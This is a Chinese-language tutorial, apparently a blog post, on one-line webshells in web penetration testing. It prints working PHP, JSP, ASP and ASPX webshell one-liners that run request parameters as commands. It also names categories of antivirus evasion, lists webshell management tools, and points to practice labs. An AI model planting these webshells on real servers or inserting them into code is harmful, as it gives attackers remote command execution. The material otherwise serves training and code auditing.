Web渗透之一句话木马

Web渗透之一句话木马

1)常见的一句话木马及漏洞关联

常见的一句话木马(按Web语言分类):

php:<?php @eval(_POST\['pass'\]);?\>(通过POST参数pass执行命令)、\_GET['cmd']);?>(通过GET参数cmd执行系统命令)

jsp:<%@page import="java.io.*"%><%Runtime.getRuntime().exec(request.getParameter("cmd"));%>(执行参数cmd的命令)、<%newProcessBuilder(request.getParameter("cmd")).start();%>

asp:<%execute(request("pass"))%>(执行POST参数pass的命令)、<%evalrequest("code")%>

aspx:<%@Page Language="C#"%><%System.Diagnostics.Process.Start(Request["cmd"]);%>、<%Response.Write(System.IO.File.ReadAllText(Request["file"]));%>(读取文件内容)

注意一句话木马杀软/edr会检测,但是咱们可以使用免杀技术来绕过检测,常见的WebShell免杀技术有:特征值处理类,代码混淆类,加密免杀类,白名单绕过类等等,后面有时间本人开免杀指导咱们再聊这些。

黑盒查看漏洞:

功能关联:

重点关注网站的文件上传功能(如头像上传、附件上传、文档上传),尝试上传包含一句话木马的文件

检查是否有数据写入功能(如留言板、配置保存、日志记录),测试能否通过输入框写入木马代码

观察文件上传后的返回信息,如是否显示文件路径、是否允许php/jsp/asp/aspx等脚本后缀

白盒代码审计:

关键词搜索:

在源码中搜索文件上传相关函数,判断是否存在过滤不严的情况:

PHP:move_uploaded_file()、is_uploaded_file()、$_FILES

JSP:ServletFileUpload、FileItem、write()

ASP:Upload组件、FileSystemObject

ASPX:FileUpload控件、SaveAs()方法

搜索文件写入相关函数,判断是否可注入木马代码:

PHP:file_put_contents()、fwrite()、fputs()

JSP:FileWriter、BufferedWriter、OutputStreamWriter

ASP:CreateTextFile()、WriteLine()

ASPX:File.WriteAllText()、StreamWriter

2)一句话木马方法

黑盒测试:

黑盒测试(无源码,基于功能场景探测)

黑盒测试不依赖目标系统的源代码,仅通过模拟攻击者的实际操作,利用网站公开功能(如文件上传、数据提交、参数交互等)尝试植入或触发一句话木马,核心思路是"寻找可写入脚本代码的入口,并验证代码是否能被服务器解析执行"。

白盒测试:

白盒测试依赖目标系统的源代码,核心是"通过审计代码逻辑,发现可植入/触发一句话木马的漏洞点"即寻找"文件操作、命令执行、参数解析"相关代码中过滤不严、逻辑缺陷的位置,判断攻击者能否利用这些缺陷注入木马代码。

3)Webshell木马工具

冰蝎(Behinder):一款国产的Webshell管理工具,支持多种加密传输方式(如AES、RSA),能有效绕过WAF检测。支持PHP、JSP、ASP、ASPX等多种脚本类型,提供命令执行、文件管理、数据库操作等功能,界面简洁,操作便捷,是国内渗透测试人员常用工具。

菜刀(Caidao):经典的Webshell管理工具,虽然版本更新较慢,但因其轻量、稳定,仍被广泛使用。支持通过HTTP协议与一句话木马交互,可执行命令、管理文件、操作数据库等,适用于多种Web语言环境。

蚁剑(AntSword):开源的Webshell管理工具,具有模块化架构,支持自定义编码和加密方式,能灵活绕过各种安全防护。提供可视化界面,支持文件管理、命令执行、反弹shell等功能,且社区活跃,插件丰富。

CobaltStrike:国外知名的渗透测试框架,其中包含Webshell管理功能。支持生成多种类型的恶意payload,可通过Webshell实现对目标主机的持久控制,集成了团队协作、会话管理、漏洞利用等多种功能,适合高级渗透测试场景。

Weevely:一款轻量级的Python编写的Webshell工具,主要针对PHP环境。支持生成隐蔽的一句话木马,通过命令行与目标交互,提供文件操作、系统命令执行、数据库访问等功能,适合在命令行环境下进行渗透测试。

自己开发WebShell工具:当然我们也可以自己写这类工具,防止指纹被识别到。

4)靶场

DVWA:包含文件上传模块,可练习各种一句话木马的上传与利用

Upload-Labs:专注于文件上传漏洞练习,包含20多种不同的上传绕过场景

VulnHub:提供多个包含Webshell漏洞的虚拟机靶场,如Metasploitable

HackTheBox:有多个包含文件上传和反序列化漏洞的靶机,适合进阶练习

CTFtime:提供大量CTF比赛中的Webshell相关题目,适合实战训练

相关推荐
witkey_ak98964 小时前
网安面试题收集(4)
网络安全
红树林074 小时前
beef-xss网页无法访问
安全·web安全·xss
kali-Myon5 小时前
NewStarCTF2025-Week3-Web
sql·安全·web安全·php·ctf
晓梦林5 小时前
万字解析upload-labs靶场(基于cyberstrikelab网络安全仿真平台)
安全·web安全
网安INF7 小时前
网络攻防技术:防火墙技术
网络·安全·web安全·网络安全·防火墙
介一安全20 小时前
【Frida Android】基础篇12:Native层hook基础——调用原生函数
android·网络安全·逆向·安全性测试·frida·1024程序员节
m0_738120721 天前
网络安全编程——TCP客户端以及服务端Python实现
python·tcp/ip·安全·web安全·网络安全
白帽子黑客罗哥1 天前
Redis实战深度剖析:高并发场景下的架构设计与性能优化
redis·网络安全·性能优化·高并发·分布式锁·秒杀系统·缓存架构
半路_出家ren1 天前
设计一个学生管理系统的数据库
linux·数据库·sql·mysql·网络安全·数据库管理员
泷羽Sec-静安1 天前
Less-1 GET-Error based-Single quotes-String GET-基于错误-单引号-字符串
前端·css·网络·sql·安全·web安全·less